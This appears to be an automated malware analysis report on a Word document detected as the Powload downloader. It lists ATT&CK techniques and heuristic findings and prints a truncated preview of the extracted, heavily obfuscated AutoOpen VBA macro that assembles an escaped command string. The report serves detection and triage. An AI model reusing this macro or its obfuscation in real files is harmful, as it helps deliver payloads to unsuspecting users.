Verdict: MALICIOUS (Risk Score 242)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call to execute a command, likely to download and run a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.Powload-6665633-0'. The obfuscated script attempts to construct a command string, but its exact target is obscured.
Heuristics (7)
- ClamAV: Doc.Downloader.Powload-6665633-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Powload-6665633-0
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10332 bytes |

SHA-256: 415ec68b4fb4da81340930856d7ee7dd71bd0e1f2f53e2c21ce2ae4e757f7588

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "iatXllNlCj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wiTZfXhjwwqSw"
Function AfcozIPiWMf()
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
Error 44846 * FXGNtw * 40350 * vTRQo
Error 54531 * bDzlH / 52027 / KrNtJB
Error 35991 / mpPOj / wdbQm / cTzlmm
GoYhPaUqIPu = "mD" + " /" + "v " + " /R" + " " + " " + " " + Chr(3 + 2 + 3 + 4 + 22) + " ^" + "s^Et " + "^ " + "^ " + " n" + "^a^5="
Error 34025 / PhRIBq
EORmZia = "==^A^A" + "g^A" + "AI^" + "A^A" + "C^A^g" + "AA"
Error NLOaN / Knujpa
Error 38620 * nulTJc
Error jzUQn * UNLjz * nirvVj / LHpwz
nTzZtzSzvi = "I^A^A" + "CAgAA^" + "I^AA" + "C^" + "A^gA^" + "AIA^A"
Error fKCPM / zUvPLJ / 98020 * WGbzjH
MaVjo = "CAg" + "^A^A^" + "I" + "^" + "A" + "AC" + "A"
Error jWUuM * LvKkBu
zcKSz = "gAAI" + "^A^0^H^" + "A9^" + "B^weA^" + "g^" + "GA" + "^jB^A" + "dAE"
Error vqGGrT * vBFmtV
Error 89368 / DjUfKI
Error dSrSu / zVAjG
Error 78689 / PNidT * GkDSt * wnokTB
Error 94566 / TRjYjY * 71362 / wbrfl
dXAmktv = "^G^" + "A" + "^jB^Qf" + "^A^sD" + "Ar^BQ" + "Y^AUG" + "Ay^B^"
Error 83761 * 4630 / LpWHA * 19780
LzzOECkKFMD = "g" + "Y^AsD" + "A" + "^zB" + "^Q^Q" + "^A^M" + "^FA^kA" + "AI" + "^A^0G^"
AfcozIPiWMf = GoYhPaUqIPu + EORmZia + nTzZtzSzvi + MaVjo + zcKSz + dXAmktv + LzzOECkKFMD
Error 62308 * vjoZb
End Function
Function lmclproGvjq()
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
Error 43549 / NEYZos
Error WvGJop / ApmbAV
hTTiumr = "AlBAd^A" + "^k^E^" + "AtAQ" + "Z" + "A^s" + "^G^AvBg" + "dA4GA" + "JBwO^"
Error QABWR * tozfn
iXIin = "A" + "kC" + "^Az^B" + "^QQ^AM" + "^FA" + "^k^AA"
Error 55850 / bRhSdV
Error 62215 * YkzfZ / GzrGI * qHjwCR
ilNKzDE = "^" + "I" + "^" + "AwC^A^U" + "^B" + "^A^U^A"
Error 4536 / SMvAjn
Error wUUlwj / OPdYqO
Error DlJAW / 53130
bGTwt = "0^GAk" + "^AAK" + "^" + "A" + "^U^GA" + "sBQ^a" + "^AYE" + "^" + "A^kBQ" + "Y^A8^G" + "AsB^g"
Error NhRlj * mSAIK
Error 37222 / JzUnC / 61905 * McssrP
Error 75510 / HtizYQ
mhILuiAfHT = "^bAc^H" + "^AvBA" + "R^A4" + "CA^x^B" + "gaA^Q" + "HA^kAw" + "^e^A^" + "k^H^AyB" + "AdA" + "s^HA" + "pA"
Error 58767 / 80498
Error qFQjk / zACnAF / BFZtsK / fZAQE
Error 63246 * kiJMpi
baNnZE = "^AUA^" + "ME^" + "A^6B^A^" + "JA^ACA" + "^u^BQ" + "a^A^ACA" + "^U^BAU^" + "A^0" + "^GA^" + "k^AAK"
Error 54501 * 21870 * 13027 * 67326
Error YTtdJW * 21204 * zlfdaQ / zbOzG
aHwqjVm = "^A^g" + "G^A^" + "j^" + "BQY^" + "AUGA^" + "yBw" + "b^A" + "YGA^7^"
Error nQJiiw * lbmsAj
Error MJiuhX * LDFRcj / 85697 * TWApFN
fwWiHTri = "A^w^" + "J^AU" + "^" + "GA4" + "BQZ^A" + "^4C^An^" + "A^" + "w^K^AIG" + "^A^3BA^" + "dAQC" + "Ar"
Error tPAEqh / YbABp
Error qHGEF * RTwtr * 37570 * 42646
Error SOLSFA / XcUVp / AjquuA * izIvS
kGPsAjGIUjj = "A^w^" + "J^AwFAn" + "^AwKA^M" + "GA^" + "pB^A" + "^bAIGA"
Error GMXLQ * JlqXSU
Error djkjYT * CwYVq
BNEzf = "1^B^A" + "c^" + "AoD^A^" + "2B^gbAU" + "G^A^" + "k^" + "A^Q" + "P^A" + "M^HAB^B"
lmclproGvjq = hTTiumr + iXIin + ilNKzDE + bGTwt + mhILuiAfHT + baNnZE + aHwqjVm + fwWiHTri + kGPsAjGIUjj + BNEzf
Error 11555 / zubBQ * zJZLr * 94582
End Function
Function UpIsMEsFUhV()
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
Error 10142 / whFQI
Error 21348 / mGBEQw / aXrfZX / tXUNm
Error 20750 / cSBZw
AizfofdKqz = "w^" + "U" + "AQC" + "^A7" + "A" + "^wJ" + "A^" + "g" + "DA^4^A" + "^A^O^Ac" + "C" + "A^g" + "AQPAAC"
Error 58446 / CrBBUM
Error zwTwn * RbzDmN * 57204 * 17352
Error 97585 / 38778 / 12815 * 30529
Error 70586 / 45777
GFnkibbv = "^" + "Ai^Bw" + "^dAQ^H" + "A" + "k^A" + "w" + "^O^ ... (truncated)
```